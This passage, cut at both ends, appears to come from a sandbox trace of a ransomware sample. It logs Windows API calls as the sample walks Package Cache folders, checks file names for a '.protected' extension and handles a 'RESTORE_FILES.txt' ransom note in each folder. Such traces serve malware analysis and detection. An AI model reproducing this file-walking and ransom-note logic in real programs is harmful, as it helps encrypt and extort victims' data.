Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.359] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.359] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, 
lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned 119 [0093.360] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.360] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*") returned 121 [0093.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\.") returned 121 [0093.360] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\..") returned 122 [0093.360] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.360] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 138 [0093.360] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 137 [0093.360] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.360] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 155 [0093.360] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.360] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 137 [0093.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package 
cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.360] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.360] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.361] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.361] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.361] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.361] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.361] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.361] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.362] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.362] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.362] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 86 [0093.362] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0093.362] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned 88 [0093.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\.") returned 88 [0093.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.363] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\..") returned 89 [0093.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.363] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.363] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 95 [0093.363] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.363] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.363] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned 97 [0093.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\.") returned 97 [0093.364] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\..") returned 98 [0093.364] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.364] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.364] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 121 [0093.364] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned 123 [0093.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\.") returned 123 [0093.364] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\..") returned 124 [0093.364] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 140 [0093.365] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.365] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.365] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 160 [0093.365] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.365] FindClose (in: hFindFile=0x47ba50 | out: 
hFindFile=0x47ba50) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.365] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.365] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.366] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.366] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.366] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.366] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.366] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.367] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 86 [0093.367] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0093.367] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned 88 [0093.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\.") returned 88 [0093.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\..") returned 89 [0093.368] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.368] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 95 [0093.368] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.368] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.368] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned 97 [0093.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\.") returned 97 [0093.369] lstrcmpW 
(lpString1=".", lpString2=".") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\..") returned 98 [0093.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.369] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.369] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 118 [0093.369] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned 120 [0093.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 0x47ba50 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\.") returned 120 [0093.369] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\..") returned 121 [0093.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 137 [0093.370] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.370] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.370] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 154 [0093.370] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.370] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package 